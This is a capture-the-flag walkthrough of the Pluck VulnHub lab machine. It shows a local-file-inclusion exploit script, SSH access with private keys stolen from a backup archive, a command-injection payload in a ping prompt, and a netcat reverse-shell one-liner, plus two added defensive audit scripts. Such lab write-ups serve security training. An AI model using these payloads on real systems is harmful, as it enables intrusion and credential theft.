Pluck – Boot2Root – Walkthrough

Introduction

« Pluck » is a new « boot2root »-style VM. You just need to launch the VM and... get root! Note that you can find this VM on Vulnhub.

Discovery

Scan all the ports!

$ sudo nmap -p- 192.168.56.101

Starting Nmap 7.01 ( https://nmap.org ) at 2017-03-20 14:14 CET
Nmap scan report for 192.168.56.101
Host is up (0.00056s latency).
Not shown: 65531 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
3306/tcp open  mysql
5355/tcp open  unknown
MAC Address: 08:00:27:45:29:54 (Oracle VirtualBox virtual NIC)

$ sudo nmap -p22,80,3306,5355 192.168.56.101 -A 

Starting Nmap 7.01 ( https://nmap.org ) at 2017-03-20 14:14 CET
Nmap scan report for 192.168.56.101
Host is up (0.00018s latency).
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.3p1 Ubuntu 1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 e8:87:ba:3e:d7:43:23:bf:4a:6b:9d:ae:63:14:ea:71 (RSA)
|_  256 8f:8c:ac:8d:e8:cc:f9:0e:89:f7:5d:a0:6c:28:56:fd (ECDSA)
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Pluck
3306/tcp open  mysql   MySQL (unauthorized)
5355/tcp open  unknown
MAC Address: 08:00:27:45:29:54 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.0
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.18 ms 192.168.56.101

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 120.55 seconds


Gaining access

Let’s have a look at the HTTP service.

Oh, "?page=about.php"? Why not try a local file inclusion? With something like .../etc/passwd?

It works! For more visibility (and fun), we can exploit the LFI with a simple Python script that uses the PHP php://filter wrapper to return the file base64-encoded (the script decodes the output).

#!/usr/bin/python
# -*- coding: utf-8 -*-

import requests
import re, base64

# The php://filter wrapper makes index.php include the target file as base64,
# so PHP sources come back verbatim instead of being executed
url = "http://192.168.56.101/index.php?page=php://filter/read=convert.base64-encode/resource="
file_lfi = "/etc/passwd"

fullurl = url + file_lfi

req = requests.get(fullurl)

# The included file is rendered inside the jumbotron div; grab the base64 blob
res = re.findall('<div class=jumbotron>(.*)</div><br>', req.text.encode('utf-8'))
if not res:
    raise SystemExit("no included file found in the response")
output = base64.b64decode(res[0])
print output

# # Write the decoded file to disk (used further down to fetch backup.tar)
# with open('backup.tar', 'wb') as f:
#     f.write(output)
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:109::/var/run/dbus:/bin/false
mysql:x:107:111:MySQL Server,,,:/nonexistent:/bin/false
lxd:x:108:65534::/var/lib/lxd/:/bin/false
uuidd:x:109:114::/run/uuidd:/bin/false
dnsmasq:x:110:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:111:65534::/var/run/sshd:/usr/sbin/nologin
pollinate:x:112:1::/var/cache/pollinate:/bin/false
bob:x:1000:1000:bob,,,:/home/bob:/bin/bash
Debian-exim:x:113:119::/var/spool/exim4:/bin/false
peter:x:1001:1001:,,,:/home/peter:/bin/bash
paul:x:1002:1002:,,,:/home/paul:/usr/bin/pdmenu
backup-user:x:1003:1003:Just to make backups easier,,,:/backups:/usr/local/scripts/backup.sh
/etc/passwd output

We can see something unusual at the end of the file: "backups easier,,,:/backups:/usr/local/scripts/backup.sh". To get the content of that script, just change the "file_lfi" variable in the Python script:

#!/bin/bash

########################
# Server Backup script #
########################

#Backup directories in /backups so we can get it via tftp

echo "Backing up data"
tar -cf /backups/backup.tar /home /var/www/html > /dev/null 2& > /dev/null
echo "Backup complete"

Two directories (/home and /var/www/html) are backed up into /backups/backup.tar. Let's grab it (uncomment the last lines of the Python script to write it wherever you want).
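The thing that gave the backup script away is an account whose login shell is not a real shell. As an added example (not part of the original walkthrough), this flags every such account in a passwd file; the sample is a constructed excerpt of the /etc/passwd shown above, and the list of known shells is an assumption (a real audit would read /etc/shells).

```python
# Constructed excerpt of the /etc/passwd listing above (not the whole file)
PASSWD_SAMPLE = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
mysql:x:107:111:MySQL Server,,,:/nonexistent:/bin/false
bob:x:1000:1000:bob,,,:/home/bob:/bin/bash
paul:x:1002:1002:,,,:/home/paul:/usr/bin/pdmenu
backup-user:x:1003:1003:Just to make backups easier,,,:/backups:/usr/local/scripts/backup.sh
"""

# Assumption: shells one expects in /etc/shells on an Ubuntu box
KNOWN_SHELLS = {"/bin/sh", "/bin/bash", "/bin/dash",
                "/usr/sbin/nologin", "/bin/false"}


def parse_passwd(text):
    """Yield (name, uid, gid, home, shell) for each well-formed 7-field line."""
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            continue  # malformed line: skip it rather than crash the audit
        name, _pw, uid, gid, _gecos, home, shell = fields
        yield name, int(uid), int(gid), home, shell


def odd_shells(text, known=KNOWN_SHELLS):
    """Return (name, shell) for accounts whose shell is not a known shell.

    On Pluck two accounts stand out: paul lands in pdmenu (a restricted menu)
    and backup-user runs a script under /usr/local/scripts at every login.
    Such a program runs with that user's rights, so it deserves a look.
    """
    return [(name, shell) for name, _uid, _gid, _home, shell in parse_passwd(text)
            if shell not in known]


if __name__ == "__main__":
    for name, shell in odd_shells(PASSWD_SAMPLE):
        print("%-12s %s" % (name, shell))
```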

$ file backup.tar 
backup.tar: POSIX tar archive (GNU)

$ tar tvf backup.tar
drwxr-xr-x root/root         0 2017-01-18 09:27 home/
drwxr-xr-x bob/bob           0 2017-01-18 13:43 home/bob/
-rw-r--r-- bob/bob        3771 2017-01-18 06:39 home/bob/.bashrc
-rw-r--r-- bob/bob           0 2017-01-18 09:40 home/bob/.sudo_as_admin_successful
-rw-r--r-- bob/bob         655 2017-01-18 06:39 home/bob/.profile
-rw-r--r-- bob/bob         220 2017-01-18 06:39 home/bob/.bash_logout
drwxr-xr-x paul/paul         0 2017-01-18 19:13 home/paul/
drwxrwxr-x paul/paul         0 2017-01-18 19:09 home/paul/keys/
-rwxrwxr-x paul/paul       600 2017-01-18 19:08 home/paul/keys/id_key3.pub
-rwxrwxr-x paul/paul       600 2017-01-18 19:08 home/paul/keys/id_key2.pub
-rwxrwxr-x paul/paul       672 2017-01-18 19:08 home/paul/keys/id_key2
-rwxrwxr-x paul/paul       392 2017-01-18 19:09 home/paul/keys/id_key4.pub
-rwxrwxr-x paul/paul       600 2017-01-18 19:08 home/paul/keys/id_key5.pub
-rwxrwxr-x paul/paul      1675 2017-01-18 19:09 home/paul/keys/id_key6
-rwxrwxr-x paul/paul       668 2017-01-18 19:08 home/paul/keys/id_key1
-rwxrwxr-x paul/paul       668 2017-01-18 19:08 home/paul/keys/id_key5
-rwxrwxr-x paul/paul       600 2017-01-18 19:08 home/paul/keys/id_key1.pub
-rwxrwxr-x paul/paul       392 2017-01-18 19:09 home/paul/keys/id_key6.pub
-rwxrwxr-x paul/paul      1679 2017-01-18 19:09 home/paul/keys/id_key4
-rwxrwxr-x paul/paul       668 2017-01-18 19:08 home/paul/keys/id_key3
-rw-r--r-- paul/paul      3771 2017-01-18 09:04 home/paul/.bashrc
-rw-r--r-- paul/paul       655 2017-01-18 09:04 home/paul/.profile
-rw-r--r-- paul/paul       220 2017-01-18 09:04 home/paul/.bash_logout
drwxr-xr-x peter/peter       0 2017-01-18 09:04 home/peter/
-rw-r--r-- peter/peter    3771 2017-01-18 09:04 home/peter/.bashrc
-rw-r--r-- peter/peter     655 2017-01-18 09:04 home/peter/.profile
-rw-r--r-- peter/peter     220 2017-01-18 09:04 home/peter/.bash_logout
drwxr-xr-x root/root         0 2017-01-18 19:28 var/www/html/
drwxr-xr-x root/root         0 2016-07-25 15:53 var/www/html/fonts/
-rw-r--r-- root/root    108738 2016-07-25 13:43 var/www/html/fonts/glyphicons-halflings-regular.svg
-rw-r--r-- root/root     18028 2016-07-25 13:43 var/www/html/fonts/glyphicons-halflings-regular.woff2
-rw-r--r-- root/root     45404 2016-07-25 13:43 var/www/html/fonts/glyphicons-halflings-regular.ttf
-rw-r--r-- root/root     23424 2016-07-25 13:43 var/www/html/fonts/glyphicons-halflings-regular.woff
-rw-r--r-- root/root     20127 2016-07-25 13:43 var/www/html/fonts/glyphicons-halflings-regular.eot
-rw-r--r-- root/root       589 2017-01-18 18:16 var/www/html/about.php
-rw-r--r-- root/root      1427 2017-01-18 19:28 var/www/html/index.php
-rw-r--r-- root/root       241 2017-01-18 16:10 var/www/html/footer.php
drwxr-xr-x root/root         0 2016-07-25 15:53 var/www/html/css/
-rw-r--r-- root/root    389287 2016-07-25 15:53 var/www/html/css/bootstrap.css.map
-rw-r--r-- root/root    542194 2016-07-25 15:53 var/www/html/css/bootstrap.min.css.map
-rw-r--r-- root/root     26132 2016-07-25 15:53 var/www/html/css/bootstrap-theme.css
-rw-r--r-- root/root     23409 2016-07-25 15:53 var/www/html/css/bootstrap-theme.min.css
-rw-r--r-- root/root    121200 2016-07-25 15:53 var/www/html/css/bootstrap.min.css
-rw-r--r-- root/root     25648 2016-07-25 15:53 var/www/html/css/bootstrap-theme.min.css.map
-rw-r--r-- root/root     47706 2016-07-25 15:53 var/www/html/css/bootstrap-theme.css.map
-rw-r--r-- root/root    146010 2016-07-25 15:53 var/www/html/css/bootstrap.css
-rw-r--r-- root/root      1492 2017-01-18 17:09 var/www/html/header.php
-rw-r--r-- root/root      1486 2017-01-18 18:24 var/www/html/admin.php
drwxr-xr-x root/root         0 2017-01-18 16:08 var/www/html/js/
-rw-r--r-- root/root     97163 2016-12-20 19:17 var/www/html/js/jquery.min.js
-rw-r--r-- root/root     69707 2016-07-25 15:53 var/www/html/js/bootstrap.js
-rw-r--r-- root/root       484 2016-07-25 15:53 var/www/html/js/npm.js
-rw-r--r-- root/root     37045 2016-07-25 15:53 var/www/html/js/bootstrap.min.js

Wow, many id_key files! And an SSH server is up 🙂 Trying all the keys, only id_key4 works!

$ ssh paul@192.168.56.101 -i id_key4
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@         WARNING: UNPROTECTED PRIVATE KEY FILE!          @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Permissions 0755 for 'id_key4' are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.
Load key "id_key4": bad permissions
paul@192.168.56.101's password: 

Oops, bad perms! Fix it!

chmod 600 id_key*

W00t! Connected... but stuck in a pdmenu :/

Escape PDMENU / Reverse shell access

With this menu, we can list/browse directories, modify files (if we have permissions, of course), navigate with lynx, ping, or establish a telnet connection. Every time I see a prompt that allows a ping command, I think "Command Injection" :-). Here we go:

1;`id`
Payload - test

Reverse shell time! Set up a listener on port 8081, and inject the following payload:

1;`mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.1 8081 >/tmp/f`

Gaining root access / Privilege escalation

How to get root? What's the kernel? What's the OS?

$ uname -a
Linux pluck 4.8.0-22-generic #24-Ubuntu SMP Sat Oct 8 09:15:00 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
$ cat /etc/*release*
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=16.10
DISTRIB_CODENAME=yakkety
DISTRIB_DESCRIPTION="Ubuntu 16.10"
NAME="Ubuntu"
VERSION="16.10 (Yakkety Yak)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 16.10"
VERSION_ID="16.10"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="http://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
VERSION_CODENAME=yakkety
UBUNTU_CODENAME=yakkety
Information Gathering - Kernel/OS

What about Dirtyc0w?

Patched kernel versions (Ubuntu):
4.8.0-26.28 for Ubuntu 16.10
4.4.0-45.66 for Ubuntu 16.04 LTS
3.13.0-100.147 for Ubuntu 14.04 LTS
3.2.0-113.155 for Ubuntu 12.04 LTS

The running kernel is 4.8.0-22, older than the patched 4.8.0-26.28 for Ubuntu 16.10: Pluck seems to be vulnerable! Exploit!
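The version comparison behind that verdict, written out as a patch-status check. This is an added example, not code from the walkthrough; the patched-version table and the uname/release strings are the ones shown above, and the only assumption is that uname -r omits the Ubuntu upload number, so it is compared at ABI granularity.

```python
import re

# Patched Ubuntu kernel versions, copied from the table above
PATCHED = {
    "16.10": "4.8.0-26.28",
    "16.04": "4.4.0-45.66",
    "14.04": "3.13.0-100.147",
    "12.04": "3.2.0-113.155",
}

# upstream x.y.z, the Ubuntu ABI number, and an optional upload number
_VER_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)-(\d+)(?:\.(\d+))?")


def parse_kernel(version):
    """'4.8.0-22-generic' -> (4, 8, 0, 22, None); '4.8.0-26.28' -> (4, 8, 0, 26, 28)."""
    m = _VER_RE.match(version)
    if not m:
        raise ValueError("unrecognised kernel version: %r" % version)
    major, minor, patch, abi, upload = m.groups()
    return (int(major), int(minor), int(patch), int(abi),
            int(upload) if upload is not None else None)


def is_patched(uname_r, release):
    """True when the running kernel is at or above the patched one for that release."""
    running = parse_kernel(uname_r)
    fixed = parse_kernel(PATCHED[release])
    # uname -r carries no upload number, so compare at ABI granularity then;
    # every fix in the table bumped the ABI, so this is exact for these kernels
    n = 4 if running[4] is None else 5
    return running[:n] >= fixed[:n]


def release_from_os_release(text):
    """Pull VERSION_ID out of /etc/os-release style output."""
    for line in text.splitlines():
        if line.startswith("VERSION_ID="):
            return line.split("=", 1)[1].strip().strip('"')
    raise ValueError("VERSION_ID not found")


# Strings taken from the uname -a and /etc/*release* output above
UNAME_R = "4.8.0-22-generic"
OS_RELEASE = 'NAME="Ubuntu"\nVERSION_ID="16.10"\n'


def check_pluck():
    rel = release_from_os_release(OS_RELEASE)
    return {"release": rel, "running": UNAME_R, "patched": PATCHED[rel],
            "vulnerable": not is_patched(UNAME_R, rel)}


if __name__ == "__main__":
    print(check_pluck())
```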

Got root 😉
